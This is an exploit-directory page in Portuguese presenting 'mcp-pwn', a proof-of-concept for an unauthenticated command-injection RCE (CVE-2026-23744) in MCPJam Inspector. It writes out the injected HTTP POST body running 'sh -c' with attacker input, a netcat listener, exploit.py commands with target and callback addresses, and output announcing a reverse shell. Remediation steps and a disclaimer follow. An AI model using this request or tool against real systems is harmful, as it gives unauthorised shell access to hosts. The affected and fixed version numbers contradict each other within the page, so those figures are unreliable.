Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
mcp-pwn — PoC exploit para CVE-2026-23744 — RCE não autenticado no MCPJam Inspector via injeção de comando serverConfig não validado em /api/mcp/connect, permitindo shell reversa como dono do processo sem credenciais. | Kitploit
Ferramentas/GitHubGitHub/jf-gondim/mcp-pwn
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleAprendizado e EducaçãoRed Teaming
GitHubjf-gondim/mcp-pwn

mcp-pwn

PoC exploit para CVE-2026-23744 — RCE não autenticado no MCPJam Inspector via injeção de comando serverConfig não validado em /api/mcp/connect, permitindo shell reversa como dono do processo sem credenciais.

Ver Repositório
37há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-23744 — Execução Remota de Código Não Autenticada no MCPJam

Resumo

O MCPJam é um inspetor e proxy MCP (Model Context Protocol) de código aberto usado para conectar, depurar e gerenciar servidores MCP. As versões <= 1.4.2 expõem o endpoint /api/mcp/connect sem autenticação ou validação de entrada. Um atacante remoto não autenticado pode injetar comandos arbitrários do sistema operacional por meio dos campos serverConfig.command / serverConfig.args, obtendo execução remota de código com os privilégios do proprietário do processo.


Detalhes da Vulnerabilidade

CampoValor
ID CVECVE-2026-23744
Pontuação CVSS9.8 (Crítico)
Vetor CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-78 — Neutralização Incorreta de Elementos Especiais em um Comando do SO
ComponenteMCPJam MCP Proxy Inspector
AfetadoMCPJam <= 1.4.2
CorrigidoMCPJam >= 1.4.3
Vetor de AtaqueRede — Nenhuma Autenticação Necessária
Divulgação2026-01-15

Análise Técnica

O endpoint vulnerável aceita uma requisição JSON POST não autenticada:

root@kitploit:~
POST /api/mcp/connect HTTP/1.1
Host: <target>:3000
Content-Type: application/json

{
  "serverConfig": {
    "command": "sh",
    "args": ["-c", "<ATTACKER_CONTROLLED>"],
    "env": {}
  },
  "serverId": "any_string"
}

O MCPJam passa command e args diretamente para o spawner de processos do Node.js (child_process.spawn ou equivalente) sem:

  • Validação de entrada ou lista de permissões de comandos
  • Aplicação de autenticação ou autorização neste endpoint
  • Sandboxing, namespacing ou redução de privilégios

Um atacante que consiga alcançar a porta 3000 (padrão) pode fornecer um payload de reverse shell em args[1], obtendo um shell como o proprietário do processo MCPJam — frequentemente root ou uma conta de serviço com amplo acesso ao sistema.

Causa Raiz

A ausência de uma proteção de middleware de autenticação em /api/mcp/connect combinada com o uso não controlado de valores fornecidos pelo usuário em uma chamada de process-spawn cria uma injeção de comandos do SO não autenticada (CWE-78) clássica.


Uso do Exploit

Requisitos

root@kitploit:~
pip install requests urllib3

Argumentos

root@kitploit:~
  -t, --target          Target IP or hostname
  -p, --port            Target port (default MCPJam: 3000)
  -l, --lhost           Local IP for reverse-shell callback
  -r, --lport           Local port for reverse-shell callback
      --timeout         Seconds to wait for target availability (default: 30)
      --shell-timeout   POST timeout before assuming shell dropped (default: 5)
  -v, --verbose         Print full HTTP response body

Passo a passo

1. Inicie um listener netcat na sua máquina:

root@kitploit:~
nc -lvnp 4444

2. Execute o exploit:

root@kitploit:~
# Básico
python3 exploit.py -t 10.10.11.50 -p 3000 -l 10.10.14.5 -r 4444

# Verboso + tempo de disponibilidade estendido (alvos lentos)
python3 exploit.py -t 10.10.11.50 -p 3000 -l 10.10.14.5 -r 4444 --timeout 60 -v

# Tempo de shell mais longo (dê mais tempo antes de assumir que o shell foi estabelecido)
python3 exploit.py -t 10.10.11.50 -p 3000 -l 10.10.14.5 -r 9001 --shell-timeout 10

Saída Esperada

root@kitploit:~
 ╔═══════════════════════════════════════════════════════════════════╗
 ║     MCPJam  ·  Unauthenticated RCE via serverConfig Injection     ║
 ║                        CVE-2026-23744                             ║
 ╚═══════════════════════════════════════════════════════════════════╝
  CVE ID      :  CVE-2026-23744
  Component   :  MCPJam MCP Proxy Inspector
  Affected    :  <= 1.2.3   →  Patched: >= 1.2.4
  CVSS Score  :  9.8 (Critical)
  CVSS Vector :  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  CWE         :  CWE-78 — OS Command Injection
  Type        :  Unauthenticated Remote Code Execution  (Network / No Auth)
  Reference   :  https://nvd.nist.gov/vuln/detail/CVE-2026-23744

  10:32:01 [*] Probing target 10.10.11.50:3000  (max 30s) ...
  10:32:02 [+] Target is alive — HTTP 200

  10:32:02 [*] Exploit endpoint  : http://10.10.11.50:3000/api/mcp/connect
  10:32:02 [*] Reverse-shell CB  : 10.10.14.5:4444
  10:32:02 [!] Ensure listener   : nc -lvnp 4444
  10:32:02 [*] Firing payload    ...

  10:32:07 [+] POST timed out after 5s — reverse shell likely established on 10.10.14.5:4444
  10:32:07 [+] Switch to your netcat listener — incoming connection expected.

  10:32:07 [+] Exploit routine complete.

O tempo limite expirado = indicador de sucesso. Quando a requisição POST expira, o processo alvo fica bloqueado no reverse shell aberto — esse é o comportamento esperado, confirmando que o RCE foi alcançado. Mude imediatamente para o seu listener.


Remediação

PrioridadeAção
CríticoAtualize o MCPJam para >= 1.2.4
AltaRestrinja /api/mcp/connect atrás de um middleware de autenticação
AltaAplique uma regra de firewall em nível de rede limitando o acesso à porta do MCPJam apenas a IPs confiáveis
MédiaAdicione à lista de permissões os valores permitidos para serverConfig.command
MédiaExecute o MCPJam dentro de um contêiner / com um usuário Linux restrito (sem shell, sem /dev/tcp)
BaixaAtive o registro de auditoria em eventos de criação de processos

Referências

  • CVE-2026-23744: REC no inspetor MCPJam devido à exposição de endpoint HTTP
  • NVD — CVE-2026-23744
  • CWE-78: Injeção de Comandos do SO
  • OWASP: Injeção de Comandos
  • OWASP Top 10: A03 Injeção
  • Model Context Protocol — Considerações de Segurança
  • Projeto MCPJam

Aviso Legal

Este exploit é fornecido estritamente para fins educacionais e testes de segurança autorizados. Utilize apenas contra sistemas que você possui ou para os quais tenha permissão explícita por escrito para testar. O uso não autorizado é ilegal e antiético.

Baixar ferramenta